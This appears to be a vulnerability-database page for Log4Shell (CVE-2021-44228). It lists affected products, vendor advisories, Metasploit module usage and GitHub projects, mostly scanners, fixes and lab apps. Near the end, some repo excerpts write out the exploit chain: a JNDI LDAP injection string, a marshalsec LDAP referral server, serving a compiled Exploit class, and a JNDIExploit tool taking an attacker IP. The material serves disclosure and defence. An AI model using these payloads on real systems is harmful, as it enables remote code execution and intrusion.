CVE-2021-44228

CVSSv4: NA | CVSSv3: 10 | CVSSv2: 9.3 | VMScore: 1000 | EPSS: 0.97232 | KEV: Exploitation Reported
Published: 10/12/2021 Updated: 21/11/2024

Vulnerability Summary

Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Vulnerable Product Search on Vulmon

apache log4j

apache log4j 2.0

siemens sppa-t3000 ses3000 firmware

siemens capital

siemens capital 2019.1

siemens comos

siemens desigo cc advanced reports 4.0

siemens desigo cc advanced reports 4.1

siemens desigo cc advanced reports 4.2

siemens desigo cc advanced reports 5.0

siemens desigo cc advanced reports 5.1

siemens desigo cc info center 5.0

siemens desigo cc info center 5.1

siemens e-car operation center

siemens energy engage 3.1

siemens energyip 8.5

siemens energyip 8.6

siemens energyip 8.7

siemens energyip 9.0

siemens energyip prepay 3.7

siemens energyip prepay 3.8

siemens gma-manager

siemens head-end system universal device integration system

siemens industrial edge management

siemens industrial edge management hub

siemens logo! soft comfort

siemens mendix

siemens mindsphere

siemens navigator

siemens nx

siemens opcenter intelligence

siemens operation scheduler

siemens sentron powermanager 4.1

siemens sentron powermanager 4.2

siemens siguard dsa 4.2

siemens siguard dsa 4.3

siemens siguard dsa 4.4

siemens sipass integrated 2.80

siemens sipass integrated 2.85

siemens siveillance command

siemens siveillance control pro

siemens siveillance identity 1.5

siemens siveillance identity 1.6

siemens siveillance vantage

siemens siveillance viewpoint

siemens solid edge cam pro

siemens solid edge harness design

siemens solid edge harness design 2020

siemens spectrum power 4

siemens spectrum power 4 4.70

siemens spectrum power 7

siemens spectrum power 7 2.30

siemens teamcenter

siemens vesys

siemens vesys 2019.1

siemens xpedition enterprise -

siemens xpedition package integrator -

intel audio development kit -

intel computer vision annotation tool -

intel data center manager

intel genomics kernel library -

intel oneapi sample browser -

intel secure device onboard -

intel sensor solution firmware development kit -

intel system debugger -

intel system studio -

debian debian linux 9.0

debian debian linux 10.0

debian debian linux 11.0

fedoraproject fedora 34

fedoraproject fedora 35

sonicwall email security

netapp active iq unified manager -

netapp cloud insights -

netapp cloud manager -

netapp cloud secure agent -

netapp oncommand insight -

netapp ontap tools -

netapp snapcenter -

cisco advanced malware protection virtual private cloud appliance

cisco automated subsea tuning

cisco broadworks

cisco business process automation

cisco cloud connect

cisco cloudcenter

cisco cloudcenter cost optimizer

cisco cloudcenter suite admin

cisco cloudcenter workload manager

cisco common services platform collector

cisco connected mobile experiences -

cisco contact center domain manager

cisco contact center management portal

cisco crosswork data gateway

cisco crosswork data gateway 3.0.0

cisco crosswork network controller

cisco crosswork network controller 3.0.0

cisco crosswork optimization engine

cisco crosswork optimization engine 3.0.0

cisco crosswork platform infrastructure

cisco crosswork platform infrastructure 4.1.0

cisco crosswork zero touch provisioning

cisco crosswork zero touch provisioning 3.0.0

cisco customer experience cloud agent

cisco cyber vision sensor management extension

cisco data center network manager

cisco data center network manager 11.3(1)

cisco dna center

cisco dna spaces connector

cisco emergency responder

cisco enterprise chat and email

cisco evolved programmable network manager

cisco finesse

cisco finesse 12.6(1)

cisco fog director -

cisco identity services engine

cisco identity services engine 2.4.0

cisco integrated management controller supervisor

cisco intersight virtual appliance

cisco iot operations dashboard -

cisco network assurance engine

cisco network services orchestrator

cisco nexus dashboard

cisco nexus insights

cisco optical network controller

cisco packaged contact center enterprise

cisco packaged contact center enterprise 11.6(1)

cisco paging server

cisco prime service catalog

cisco sd-wan vmanage

cisco smart phy

cisco ucs central

cisco ucs director

cisco unified communications manager

cisco unified communications manager 11.5(1)

cisco unified communications manager 11.5(1)su3

cisco unified communications manager im and presence service

cisco unified communications manager im and presence service 11.5(1)

cisco unified contact center enterprise

cisco unified contact center enterprise 11.6(2)

cisco unified contact center express

cisco unified customer voice portal

cisco unified customer voice portal 11.6

cisco unified customer voice portal 12.0

cisco unified customer voice portal 12.5

cisco unity connection

cisco video surveillance operations manager

cisco virtual topology system

cisco virtualized infrastructure manager

cisco virtualized voice browser

cisco wan automation engine

cisco webex meetings server

cisco webex meetings server 3.0

cisco webex meetings server 4.0

cisco workload optimization manager

cisco unified intelligence center

cisco unified sip proxy

cisco unified workforce optimization

cisco fxos 6.2.3

cisco fxos 6.3.0

cisco fxos 6.4.0

cisco fxos 6.5.0

cisco fxos 6.6.0

cisco fxos 6.7.0

cisco fxos 7.0.0

cisco fxos 7.1.0

cisco automated subsea tuning 02.01.00

cisco broadworks -

cisco cloudcenter suite 4.10(0.15)

cisco cloudcenter suite 5.3(0)

cisco cloudcenter suite 5.4(1)

cisco cloudcenter suite 5.5(0)

cisco cloudcenter suite 5.5(1)

cisco common services platform collector 002.009(000.000)

cisco common services platform collector 002.009(000.001)

cisco common services platform collector 002.009(000.002)

cisco common services platform collector 002.009(001.000)

cisco common services platform collector 002.009(001.001)

cisco common services platform collector 002.009(001.002)

cisco common services platform collector 002.010(000.000)

cisco connected analytics for network deployment 006.004.000.003

cisco connected analytics for network deployment 006.005.000.

cisco connected analytics for network deployment 006.005.000.000

cisco connected analytics for network deployment 007.000.001

cisco connected analytics for network deployment 007.001.000

cisco connected analytics for network deployment 007.002.000

cisco connected analytics for network deployment 7.3

cisco connected analytics for network deployment 007.003.000

cisco connected analytics for network deployment 007.003.001.001

cisco connected analytics for network deployment 007.003.003

cisco connected analytics for network deployment 008.000.000

cisco connected analytics for network deployment 008.000.000.000.004

cisco crosswork network automation -

cisco crosswork network automation 2.0.0

cisco crosswork network automation 3.0.0

cisco crosswork network automation 4.1.0

cisco crosswork network automation 4.1.1

cisco cx cloud agent 001.012

cisco cyber vision 4.0.2

cisco cyber vision sensor management extension 4.0.2

cisco dna center 2.2.2.8

cisco dna spaces -

cisco dna spaces connector -

cisco emergency responder 11.5

cisco emergency responder 11.5(4.65000.14)

cisco emergency responder 11.5(4.66000.14)

cisco enterprise chat and email 12.0(1)

cisco enterprise chat and email 12.5(1)

cisco enterprise chat and email 12.6(1)

cisco evolved programmable network manager 3.0

cisco evolved programmable network manager 3.1

cisco evolved programmable network manager 4.0

cisco evolved programmable network manager 4.1

cisco evolved programmable network manager 5.0

cisco evolved programmable network manager 5.1

cisco finesse 12.5(1)

cisco firepower threat defense 6.2.3

cisco firepower threat defense 6.3.0

cisco firepower threat defense 6.4.0

cisco firepower threat defense 6.5.0

cisco firepower threat defense 6.6.0

cisco firepower threat defense 6.7.0

cisco firepower threat defense 7.0.0

cisco firepower threat defense 7.1.0

cisco identity services engine 002.004(000.914)

cisco identity services engine 002.006(000.156)

cisco identity services engine 002.007(000.356)

cisco identity services engine 003.000(000.458)

cisco identity services engine 003.001(000.518)

cisco identity services engine 003.002(000.116)

cisco integrated management controller supervisor 002.003(002.000)

cisco integrated management controller supervisor 2.3.2.0

cisco intersight virtual appliance 1.0.9-343

cisco mobility services engine -

cisco network assurance engine 6.0(2.1912)

cisco network dashboard fabric controller 11.0(1)

cisco network dashboard fabric controller 11.1(1)

cisco network dashboard fabric controller 11.2(1)

cisco network dashboard fabric controller 11.3(1)

cisco network dashboard fabric controller 11.4(1)

cisco network dashboard fabric controller 11.5(1)

cisco network dashboard fabric controller 11.5(2)

cisco network dashboard fabric controller 11.5(3)

cisco network insights for data center 6.0(2.1914)

cisco network services orchestrator -

cisco optical network controller 1.1

cisco paging server 8.3(1)

cisco paging server 8.4(1)

cisco paging server 8.5(1)

cisco paging server 9.0(1)

cisco paging server 9.0(2)

cisco paging server 9.1(1)

cisco paging server 12.5(2)

cisco paging server 14.0(1)

cisco prime service catalog 12.1

cisco sd-wan vmanage 20.3

cisco sd-wan vmanage 20.4

cisco sd-wan vmanage 20.5

cisco sd-wan vmanage 20.6

cisco sd-wan vmanage 20.6.1

cisco sd-wan vmanage 20.7

cisco sd-wan vmanage 20.8

cisco smart phy 3.1.2

cisco smart phy 3.1.3

cisco smart phy 3.1.4

cisco smart phy 3.1.5

cisco smart phy 3.2.1

cisco smart phy 21.3

cisco ucs central software 2.0

cisco ucs central software 2.0(1a)

cisco ucs central software 2.0(1b)

cisco ucs central software 2.0(1c)

cisco ucs central software 2.0(1d)

cisco ucs central software 2.0(1e)

cisco ucs central software 2.0(1f)

cisco ucs central software 2.0(1g)

cisco ucs central software 2.0(1h)

cisco ucs central software 2.0(1k)

cisco ucs central software 2.0(1l)

cisco unified communications manager 11.5(1.17900.52)

cisco unified communications manager 11.5(1.18119.2)

cisco unified communications manager 11.5(1.18900.97)

cisco unified communications manager 11.5(1.21900.40)

cisco unified communications manager 11.5(1.22900.28)

cisco unified communications manager im & presence service 11.5(1)

cisco unified communications manager im & presence service 11.5(1.22900.6)

cisco unified computing system 006.008(001.000)

cisco unified contact center enterprise 12.0(1)

cisco unified contact center enterprise 12.5(1)

cisco unified contact center enterprise 12.6(1)

cisco unified contact center enterprise 12.6(2)

cisco unified contact center express 12.5(1)

cisco unified contact center express 12.6(1)

cisco unified contact center express 12.6(2)

cisco unified contact center management portal 12.6(1)

cisco unified customer voice portal 11.6(1)

cisco unified customer voice portal 12.0(1)

cisco unified customer voice portal 12.5(1)

cisco unified customer voice portal 12.6(1)

cisco unified intelligence center 12.6(1)

cisco unified intelligence center 12.6(2)

cisco unified sip proxy 010.000(000)

cisco unified sip proxy 010.000(001)

cisco unified sip proxy 010.002(000)

cisco unified sip proxy 010.002(001)

cisco unified workforce optimization 11.5(1)

cisco unity connection 11.5

cisco unity connection 11.5(1.10000.6)

cisco video surveillance manager 7.14(1.26)

cisco video surveillance manager 7.14(2.26)

cisco video surveillance manager 7.14(3.025)

cisco video surveillance manager 7.14(4.018)

cisco virtual topology system 2.6.6

cisco wan automation engine 7.1.3

cisco wan automation engine 7.2.1

cisco wan automation engine 7.2.2

cisco wan automation engine 7.2.3

cisco wan automation engine 7.3

cisco wan automation engine 7.4

cisco wan automation engine 7.5

cisco wan automation engine 7.6

snowsoftware snow commander

snowsoftware vm access proxy

bentley synchro

bentley synchro 4d

percussion rhythmyx

apple xcode

Vendor Advisories

Synopsis: Critical: Red Hat Process Automation Manager 7.12.0 security update. Type/Severity: Security Advisory: Critical. Topic: An update is now available for Red Hat Process Automation Manager. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gi ...
Debian Bug report logs - #1001729 apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default configurations. Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debianor ...
Debian Bug report logs - #1001478 apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages. Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>. Date: Fri, 10 Dec ...
It was found that the fix to address CVE-2021-44228 in Apache Log4j, a Logging Framework for Java, was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:l ...
Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular Logging Framework for Java. JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message pa ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046. However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM. This update modifies Amazon L ...
Amazon Kinesis Agent versions within Amazon Linux 2 (AL2) prior to aws-kinesis-agent-204-1 included a version of Apache Log4j affected by CVE-2021-44228 and CVE-2021-45046. The Amazon Kinesis Agent has been updated to aws-kinesis-agent-204-1 within Amazon Linux 2, which mitigates CVE-2021-44228 and CVE-2021-45046. For additional detail see https: ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 2.0.0 and before and including 2.14.1, which could allow a remote attacker to execute code on the server if the system logs an attacker controlled string value with the attacker's JNDI LDAP server lookup. The highest threat from the vulnerability is to data confidentiality ...
Critical Vulnerabilities in Apache Log4j Java Logging Library. On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoin ...
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2 ...
ALAS-2022-225 Amazon Linux 2022 Security Advisory: ALAS-2022-225. Advisory Release Date: 2022-12-06 16:42 Pacific ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 2.0-beta9 and before and including 2.14.1. This could allow a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup (CVE-2021-44228) ...
A vulnerability (CVE-2021-44228) exists in Hitachi Storage Plug-in for VMware vCenter. Affected products and versions are listed below. Please upgrade your version to the appropriate version, or apply the Workarounds ...
A vulnerability exists in JP1/VERITAS. Affected products and versions are listed below. Please upgrade your version to the appropriate version ...
A vulnerability (CVE-2021-44228) exists in Hitachi Device Manager, Hitachi Infrastructure Analytics Advisor, Hitachi Automation Director, Hitachi Ops Center Analyzer, Hitachi Ops Center Automator and Hitachi Ops Center Administrator. Affected products and versions are listed below. Please upgrade your version to the appropriate version, or apply ...
Citrix is aware of four vulnerabilities affecting Apache Log4j2, three of which may allow an attacker to execute arbitrary code. These three vulnerabilities have been given the following identifiers: ...

Exploits

VMware vCenter Server is affected by the Log4Shell vulnerability, whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This Metasploit ...
This Metasploit module will exploit an HTTP endpoint with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the ta ...
MobileIron Core is affected by the Log4Shell vulnerability, whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This Metasploit module will start an LDAP server that the target will need to connect to ...
The latest version (5.1) and all prior versions of Intel's Data Center Manager are vulnerable to a local privilege escalation vulnerability using the application user "dcm" used to run the web application and the REST interface. An attacker who gained remote code execution using this dcm user (i.e., through Log4j) is then able to escalate their pr ...
Apache Log4j2 versions 2.14.1 and below information disclosure exploit ...
Apache Log4j2 versions 2.0-beta-9 and 2.14.1 remote code execution exploit ...
Versions of Apache Log4j2 impacted by CVE-2021-44228, which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will scan an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that will ...
Versions of Apache Log4j2 impacted by CVE-2021-44228, which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP endpoint with the Log4Shell vulnerability by injecting a format message that ...

Mailing Lists

Hello, To emphasize again: this needs write access to the Log4j configuration. Moritz ...
Severity: moderate (CVSS: 3.7 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Patte ...
Severity: critical. Description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup s ...
Description: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashi ...
Hi Ron, Is there any information on the non-default configuration that triggers the DoS? What I am trying to understand is, if we clear the first CVE through, say, envar LOG4J_FORMAT_MSG_NO_LOOKUPS=true or -Dlog4j2.formatMsgNoLookups=true, then where does the vulnerability lie for the second CVE? What configuration change needs to be done to re ...

Metasploit Modules

Log4Shell HTTP Scanner

Versions of Apache Log4j2 impacted by CVE-2021-44228, which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will scan an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include HTTP headers and the HTTP request path. Known impacted software includes Apache Struts 2, VMware vCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki, Apache OFBiz.

msf > use auxiliary/scanner/http/log4shell_scanner
msf auxiliary(log4shell_scanner) > show actions
    ...actions...
msf auxiliary(log4shell_scanner) > set ACTION < action-name >
msf auxiliary(log4shell_scanner) > show options
    ...show and set options...
msf auxiliary(log4shell_scanner) > run

Log4Shell HTTP Header Injection

Versions of Apache Log4j2 impacted by CVE-2021-44228, which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP endpoint with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

msf > use exploit/multi/http/log4shell_header_injection
msf exploit(log4shell_header_injection) > show targets
    ...targets...
msf exploit(log4shell_header_injection) > set TARGET < target-id >
msf exploit(log4shell_header_injection) > show options
    ...show and set options...
msf exploit(log4shell_header_injection) > exploit

Github Repositories

Python script to map alert signatures to MITRE ATT&CK techniques.

MITRE ATT&CK Mapper. This project provides a Python script to map alert signatures to MITRE ATT&CK techniques. It uses the mitreattack-python library to fetch detailed information about MITRE ATT&CK techniques dynamically from the latest STIX data. Table of Contents: MITRE ATT&CK Mapper, Table of Contents, Features, Prerequisites, Installation, Usage

log4j-shell-poc. A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. Recently there was a new vulnerability in log4j, a Java logging library that is very widely used in the likes of Elasticsearch, Minecraft and numerous others. In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it. Proof-of-concept (POC): As a

Edwin's stars.

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ANTLR ASL Ada Assembly AutoHotkey Awk Ballerina Batchfile Bicep Blade Brainfuck C C# C++ CMake CSS CUE Clojure CodeQL CoffeeScript Common Lisp Coq Crystal Cuda Cython D Dart Dhall Dockerfile Elixir Emacs Lisp Erlang F# F* Fennel Forth Fortran Frege GDScript Gherkin Go Groovy HCL HTML Haml Handle

Curated list of GitHub projects I starred over the years

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents API Blueprint ActionScript ApacheConf Astro C C# C++ CSS Clojure CoffeeScript Crystal DIGITAL Command Language Dart Dockerfile Elixir Elm Erlang FreeMarker Go HTML Handlebars Haskell Java JavaScript Jupyter Notebook Kotlin Less LiveScript Lua MATLAB MDX Makefile Markdown Mustache Nunjucks OCaml

log4j-scan. A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts. Features: support for lists of URLs; fuzzing for more than 60 HTTP request headers (not only the 3-4 headers seen in previous tools); fuzzing for HTTP POST data parameters; fuzzing for JSON data parameters; DNS callback support for vulnerability discovery and validation; WAF bypass

Details : CVE-2021-44228

JNDI-Exploit-12-log4shell Details : CVE-2021-44228 Usage : ----------------------------------------------------- java -jar JNDIExploit-12jar -i AttackerIP * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false) -h, --help Show this help --

Log4Shell sample vulnerable application (CVE-2021-44228). This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell. It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181. Running the application: docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

WU Gloo Mesh POC Runbook Table of Contents Gloo Mesh Labs Introduction to Gloo Mesh Lab 0 - Prerequisites Lab 1 - Setting up your Environment Variables Lab 2 - Deploy Istio Lab 3 - Deploy the Bookinfo demo app Lab 4 - Deploy the httpbin demo app Lab 5 - Deploy and register Gloo Mesh Lab 6 - Create the gateways workspace Lab 7 - Create the bookinfo workspace Lab 8a - Expose the

CVE-2021-44228. I think this one is the more practical story (sob): christophetd/log4shell-vulnerable-app. I only looked into this out of curiosity on a whim, so there are probably vague spots and mistakes. Please use it at your own risk. Building a reproduction environment: it should work in a Linux environment. 1 jd

Detect and fix log4j log4shell vulnerability (CVE-2021-44228)

log4fix. This tool is to detect and fix the log4j log4shell vulnerability (CVE-2021-44228) by looking for and removing the JndiLookup class from jar/war/ear files, with zero dependencies, for free. This tool has been tested on: Linux 32 bit and 64 bit; Windows 32 bit and 64 bit; OpenBSD 64 bit. This tool is written in the Go programming language, which means zero dependencies and

Log4j Scans: github.com/fullhunt/log4j-scan, log4shell.huntress.com/, www.cyberdrain.com/monitoring-with-powershell-detecting-log4j-files/, research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/, github.com/hillu/local-log4j-vuln-scanner, github.com/omrsafetyo/PowerShellSnippets/blob/master/In

log4j2-rce target range

springboot-login-log4j2. Project introduction: on top of laoyogd's springboot-login project, log4j2 was added to generate logs, serving as a target range for reproducing CVE-2021-44228. One-click docker deployment: github.com/Ode1esse/springboot-login-log4j2-docker. Local debugging: create the login database: create database login default character set utf8mb4 collate utf8mb4_general_ci; import init.sql; after running the project

A community sourced list of log4j-affected software

CISA Log4j (CVE-2021-44228) Vulnerability Guidance. This repository provides CISA's guidance and an overview of related software regarding the Log4j vulnerability (CVE-2021-44228). CISA urges users and administrators to upgrade to Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6), and review and monitor the Apache Log4j Security Vulnerabilities webpage for updates a

Quick Deploy to show case cve-2021-44228

Cloud One - Workload Security Log4Shell. This repo contains a quick deployment template to showcase the CVE-2021-44228 LOG4SHELL exploit and Workload Security Intrusion Prevention. Note on CFT deployment in AWS regions: I only added AMI Ids for US-EAST-1, US-EAST-2, US-WEST-1, US-WEST-2, CA-CENTRAL-1, SA-EAST-1, EU-WEST-1. Deploy CloudFormation Template. Parameters to Define:

Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.

anti-jndi. Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers. Based on the post by @shipilev (gist.github.com/shipilev/92e709a868f3d328b6636e1bfc21cf09), I ported his example to Apache2. A coworker did it for Lighttpd. I decided to make our examples public for convenience. Idea: There are only a few reasons to put th

Log4Shell dockerized full chain

Full-chain dockerized Log4Shell (CVE-2021-44228). Log4Shell (CVE-2021-44228) is a critical vulnerability in the popular log4j2 logging package. This vulnerability is extremely easy to exploit, and was fixed in log4j2 version 2.15. This repository's goal is to automate and construct the environment through a single click by using docker-compose and containers. This could be useful

Interplay of Spring Boot, Logback and Log4j2. This is a small example project that examines the interplay of Spring Boot and Logback. No idea why we use Logback and not the newer Log4j2! In the context of the CVE-2021-44228 vulnerability in the Apache Log4j library, I am extending the investigation a little with regard to the integration of

Code Insight v7 Inventory Keyword Search Script

Code Insight v7 Inventory Keyword Search Script. This Python script allows users to query their Code Insight v7 system and obtain a list of all projects potentially impacted by the Log4j security vulnerability (CVE-2021-44228), along with a listing of all potentially impacted inventory items, using a multi keyword search. Prerequisites: The following prerequisites are required to r

This repository contains all gathered resources we used during our Incident Response on CVE-2021-44228 and CVE-2021-45046 aka Log4Shell.

CVE-2021-44228: Log4j / Log4Shell Security Research Summary This repository contains all gathered resources we used during our Incident Response on CVE-2021-44228 and CVE-2021-45046 aka Log4Shell Threat Intel Mitigations / Fixes Malware Reports Advisory IOCs / Callback Domains / IP Addresses Honeypots Payloads / Obfuscation / WAF Bypass Vulnerability Scanning Exploitation

Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046) The information and code in this repository is provided "as is" and was assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community This is

Log4j for nuclei

Log4jNuclei CVE-2021-44228 Log4j for nuclei Exploit javac Exploitjava python3 -m httpserver 80 java -cp marshalsec-003-SNAPSHOT-alljar marshalsecjndiLDAPRefServer 127001/#Exploit insert log ${jndi:ldap://lhost/exploit} /////// java -jar exploit/JNDI-Injection-Exploit-10-SNAPSHOT-alljar -C 'here_command' -A 0000

Log4j2 fix

Mule patcher A simple script that patches Mule anypoint studio, but it can be adapted for other projects as well Mule seems to work after the patch though deep dives need to be done for each application Note that the scala log4j drivers have not been patched yet Legal This is a quick and dirty tool, free to use and comes with NO WARRANTY at all Use at your own risk! Usage S

Bash and PowerShell scripts to scan a local filesystem for Log4j .jar files which could be vulnerable to CVE-2021-44228 aka Log4Shell.

Log4j-Checker This repository contains scripts that can help identify jar files which may be vulnerable to CVE-2021-44228 aka Log4Shell Log4Shell Hash Check This script will find jar files within the filesystem starting from a specific path, calculate a SHA-256 hash for each jar file found - regardless of the filename - and compare this value against a user-provided list of

CVE-2021-44228-VULN-APP NOTE: This is a vulnerable virtual machine for showing what this log4j vulnerability actually is, and so on! Installation: cd CVE-2021-44228-VULN-APP/ docker build -t log4j-shell-poc . docker run --network host log4j-shell-poc Listening on port 8080

Go module to generate and transform VEX documents

go-vex Go library for generating, consuming, and operating on VEX documents This repository contains the OpenVEX Go source code This module lets authors create, modify and manage VEX documents The full documentation for this module can be found at pkg.go.dev/github.com/openvex/go-vex For more information about the OpenVEX specification implemented by this module,

Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)

log4j-remediation-tools Tools for finding and reproducing the CVE-2021-44228 log4j2 vulnerability Tools find-vulnerabilities: determine heuristically whether a running JVM is vulnerable confirm-vulnerabilities: determine with 100% accuracy whether a running JVM is vulnerable Usage Both of these tools scan all running JVM processes on a machine, and produce a CSV report abou

永恒之恶龙 (Eternal Evil Dragon) - Log4j vulnerability security self-check tool

ELong-永恒之恶龙 On the evening of December 9, 2021, the details of the Log4j vulnerability were made public. With that, a legendary hole had appeared. We gave this vulnerability a name: 永恒之恶龙 (Eternal Evil Dragon)! You can use this tool to better self-test whether you are affected by this vulnerability, or, where authorized, use this tool to better carry out vulnerability detection or exploitation. The author will keep following and gradually publish this vulnerability

LOG4J CVE-2021-44228 IOC IOC list of newly discovered zero-day vulnerability in widely used Java log library Apache Log4j IP Address list

POC for CVE-2021-44228 within Springboot

log4j Spring vulnerable POC This is a POC for a simple spring boot start backend with maven including a vulnerable log4j version for CVE-2021-44228 Spring boot bootstrapped with start.spring.io commands ./mvnw spring-boot:run: start server ./mvnw dependency:tree: print dependency tree and check for log4j version in use nc -k -l 3030: bash, start server socket to listen

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs Fuzzing for more than 60 HTTP request headers (not only the 3-4 headers of previously seen tools) Fuzzing for HTTP POST data parameters Fuzzing for JSON data parameters Supports DNS callback for vulnerability discovery and validation WAF Bypass

My Github Stars

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Adblock Filter List AppleScript Batchfile Bikeshed C C# C++ CSS Clojure CoffeeScript Crystal D Dart Dockerfile Elixir G-code Go Groovy HCL HTML Haskell Java JavaScript Jinja Jupyter Notebook Less Lua MDX Makefile Markdown Mustache Nginx Nim Nunjucks OCaml Objective-C OpenSCAD Others PHP PLpgSQL

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository we have made an example vulnerable application and proof-of-concept (POC) exploit of it A video showing the exp

[Free Training Workshop] Learn how to prevent, detect and mitigate container based threats using Calico Cloud

prevent-detect-and-mitigate-container-based-threats Using a recent real-world example, we'll illustrate how to prevent, detect and mitigate the risk of container-based threats using Calico Cloud The Spring Boot web application used in this workshop is vulnerable to Log4Shell (CVE-2021-44228) Learning Objectives This workshop will teach you how to use Calico Cloud to pro

In this public repo Insignit provides information about CVEs

cve-informatie In this public repo Insignit provides information about CVEs CVE-2021-44228 Apache Log4J + CVE-2021-45046 PrintNightMare

Log4j2-CVE-2021-44228 Introduction Reproduction of the Log4J vulnerability Software architecture Software architecture description Installation tutorial git clone gitee.com/demonbhao/log4j2-cve-2021-44228.git Install a JDK version of 1.8.0 or lower Install maven, needed for packaging Usage instructions Write your poc code block Compile Exploit.java with javac Exploit.java to produce Exploit.class Start the LDAP protocol 4 Start an http server, started simply with python,

